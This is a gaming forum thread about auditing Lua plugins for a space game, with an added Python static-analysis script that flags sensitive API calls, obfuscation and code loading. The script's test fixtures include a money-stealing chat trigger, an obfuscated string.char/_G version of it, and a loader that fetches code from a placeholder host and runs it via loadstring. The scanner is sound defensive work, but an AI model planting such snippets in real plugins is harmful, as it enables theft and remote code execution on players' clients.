Forums » Community Projects
Can I Trust That Plugin?
Over the next few weeks I will attempt to review and make transparent what each and every plugin does, connects to, and stores about you (and others). The final decision is, of course, up to you whether to use the plugins.
NOTE: The files may be changed by the authors over time, use the local links at the bottom of every review for the actual file I reviewed.
The List (in alphabetical order)
-- Catalog (Version 1.4) (author: Pizzasgood)
-- TargetLess/TouchLess (Version 1.7.15) (author: drazed/slime of [Itan])
-- TGFT_Utilities (Version 1.87/1.88, V1.85) (author: Lisa201 of [TGFT])
To do:
CaptainsKit
cargolist
ChatTimestamp
collectorwatch
customHUD
DKAutofill
kill_notify
MAID
MultiAim
Quickhail
QuickJump
reporter
TargetTools
tcs-plugins
TradeAssistant
turrethop
wg
If there are any other plugins you would like me to check out, please leave a reply in this thread and I'll try to have it done within 48 hours.
TGFT_util. is a NO on my rating
Catalog, just like Trade Assistant, but it's great
Instead of being retarded and scanning manually just publish a list of API functions to search for in a plugin and compare the functionality that the plugin is supposed to contain with the functionality of the key functions it has in the code.
It's going to stick out like a sore thumb if, for instance, FlamboyanceHUD uses the givemoney function: why would it need to give me all your money if it finds /me honks in chat?
Plugins like Anyx that actually download code to be executed should be flagged 'do not use'. There is no way to know what the author is going to execute on your game client.
There's nothing retarded about auditing code manually.
I could implement the example you gave without the words "givemoney", "TheRedSpy" or "honks" being caught by a search.
Correct, but you can't implement the example without using the API functions that give money or read text or the GKInterface() command referencing 'givemoney'. Which could all be flagged automatically.
Good idea! You may want to add the date you reviewed the plugin too, to further help with knowing what version/state the plugin was in when you looked at it
Sure I can. I'm surprised you've never heard of obfuscated code, TRS.
...especially since one of the guys who helped write the game had a thing for it...
I sort of have, but I don't have a formal education in computer science, remember; my formal education is in law, which basically means I was formally instructed in how society ran 10 years ago with a view to continuing to run it this way today.
So I'm assuming that's where you write code that writes code.
You're never going to design a system that automatically reviews and guarantees safe code, but you can easily design one that clears it for most things.
To be honest, you're making persuasive arguments that the plugin interface for Vendetta is too permissive. There's too much fun to be had to make it more restrictive.
If you manually audit the code you're not going to find code obfuscations either though. So even if Kierky goes to all the effort to review it, he might have to say something like "I have no fucking idea what this group of functions does and I couldn't tell what it did when I executed it".
Makes it too complicated to control; then you have to have all these stupid discussions about trusting your source.
Might as well just rule out as unsafe all plugins which are written cryptically. Which is where you can just look at the source code to ensure nothing is written poorly, run the automatic analysis and generate the list of functionality that a plugin uses and post that.
It gets to the point where maybe VO should have an actual plugin analyser tool that executes the code in its own little sandbox and outputs what functions it's going to execute. Couldn't you write just a normal Lua application to execute the code and print that out? Therefore you'd know what the code did without ever having to execute it in the game client.
Execution can be conditional. There would be no way to ensure that all functionality got tested.
But yeah, I do agree that you could easily identify most things with some simple grepping and just be very paranoid about anything that looks strange after a visual inspection, and you'd then be relatively secure. But not everybody is willing to put in that effort (or knows enough to do the visual inspection in the first place), so having third parties vouch for plugins is still a useful thing. Obviously to rely on that means you're trusting the third party to be honest and competent, but their vouchsafe still increases the odds that the plugin is actually safe compared to the odds if you only trust the plugin author.
My point is that just like with any other aspect of security, there is no one-size-fits-all solution. Everybody has a different perception of risk and a different level of risk-aversion. Some people install security systems in their houses and get big dogs as backup/deterrence. Nuclear facilities have multifactor authentication along with guards and numerous overlapping security systems. I have a baseball bat.
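Added example, not code from this thread, from the game, or from any of the plugins listed above: a small Python triage script that does what TRS proposes (search the source for sensitive API functions and for the primitives that load downloaded code) and adds the indicator checks that Pizzasgood's obfuscation objection calls for, so a call built at runtime via string.char and _G[...] is flagged even though the word "givemoney" never appears. The API names (givemoney, SendChat, gkinterface.GKProcessCommand), the event name, the fetch_remote helper and the four sample plugins are all constructed placeholders for illustration, not taken from the real plugin API.

```python
"""Static triage of a Lua plugin's source text.

Added example for this thread, not code from the game or from any plugin
listed above.  Every API name, event name and sample plugin below is a
constructed placeholder for illustration.
"""
import re

# Placeholder list of game API functions whose use a plugin must justify
# against its stated purpose (a chat HUD has no business giving money away).
SENSITIVE_API = ("givemoney", "SendChat", "gkinterface.GKProcessCommand")

# Primitives that run code the plugin did not ship with: anything here is a
# 'do not use' red flag, because the reviewer cannot see what gets executed.
DYNAMIC_LOAD = ("loadstring", "load", "dofile", "loadfile", "setfenv")

# Indicators that a name is being assembled at runtime, which is how a plugin
# hides a call to a sensitive function from a plain text search.
OBFUSCATION = {
    "string.char":     re.compile(r"string\.char\s*\("),
    "numeric escapes": re.compile(r"\\\d{2,3}(?:\\\d{2,3}){3,}"),       # "\103\105\118\101"
    "computed global": re.compile(r"""_G\s*\[\s*[^"'\]]"""),            # _G[expr], not _G["name"]
    "string.reverse":  re.compile(r"string\.reverse\s*\(|:reverse\s*\("),
    "char concat":     re.compile(r"""(?:"[A-Za-z]"\s*\.\.\s*){3,}"""),  # "g".."i".."v"..
}


def strip_comments(src: str) -> str:
    """Drop Lua block and line comments so a mention in a comment is not a hit.
    Crude on purpose: a '--' inside a string literal is stripped as well."""
    src = re.sub(r"--\[\[.*?\]\]", "", src, flags=re.S)
    return re.sub(r"--[^\n]*", "", src)


def scan(src: str) -> dict:
    """Return line-numbered hits in three buckets for one plugin source."""
    findings = {"sensitive": [], "dynamic_load": [], "obfuscation": []}
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        for name in SENSITIVE_API:
            # Match the name as an identifier or inside a command string.
            if re.search(r"\b" + re.escape(name) + r"\b", line):
                findings["sensitive"].append((lineno, name))
        for name in DYNAMIC_LOAD:
            if re.search(r"\b" + re.escape(name) + r"\s*\(", line):
                findings["dynamic_load"].append((lineno, name))
        for label, pattern in OBFUSCATION.items():
            if pattern.search(line):
                findings["obfuscation"].append((lineno, label))
    return findings


def verdict(findings: dict) -> str:
    """Apply the thread's rating rules: downloaded or cryptic code is out,
    sensitive calls need a purpose check, a clean search is not a guarantee."""
    if findings["dynamic_load"]:
        return "do not use"
    if findings["obfuscation"]:
        return "do not use"
    if findings["sensitive"]:
        return "review"
    return "clear by search only"


# Constructed sample plugins (not real plugins from the list above).
BENIGN = """\
local function stamp(msg) return os.date("%H:%M ") .. msg end
RegisterEvent(function(event, data) print(stamp(data.msg)) end, "CHAT_MSG_SECTOR")
"""
DIRECT = """\
RegisterEvent(function(event, data)
    if data.msg:find("/me honks") then givemoney(data.name, GetMoney()) end
end, "CHAT_MSG_SECTOR")
"""
OBFUSCATED = """\
local fn = string.char(103, 105, 118, 101, 109, 111, 110, 101, 121)  -- spells givemoney
_G[fn]("TheRedSpy", 1000000)
"""
DOWNLOADER = """\
local code = fetch_remote("http://example.invalid/payload.lua")  -- placeholder fetch
loadstring(code)()
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("direct", DIRECT),
                       ("obfuscated", OBFUSCATED), ("downloader", DOWNLOADER)):
        found = scan(src)
        print(f"{label:10s} -> {verdict(found)}  {found}")
```

The search-only verdict is deliberately named "clear by search only": as the post above says, a grep catches the direct call and the obvious disguises, but it cannot see a branch that never executes during a test run or code that is merely cryptic rather than pattern-matchable, so that result is the starting point for a visual read of the file, not the end of the review.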
Since I do have a formal education in Computer Science... as well as basic googling, a small correction; obfuscated code is simply code that is written to be unreadable (thanks for the perfect example ARF, the ol' Garbage Truck). If you were clever & patient enough you'd be able to work out what it did eventually.
But TRS, what you're talking about is a different & legitimate concern; code downloaded & executed on the fly ("code that writes [& executes] code"). There is simply no way to know what that can do, but Kierky can (and maybe already has?) designate which plugins do this, leaving it as a red flag for players to decide on a case-by-case basis depending on how much they trust the author.
Can I trust that plugin? The answer is NO.
You could vet all of them today, and they could be bad tomorrow. For example: TCS can cause a memory leak in its makefriends part, which causes clients to crash.
I use it, but that is my choice. And it's the choice of a new generation.
People will really have to use their own judgement when installing 3rd party stuff.
That's why at the bottom of every review, I provide a copy that I reviewed. Hosted on my own site.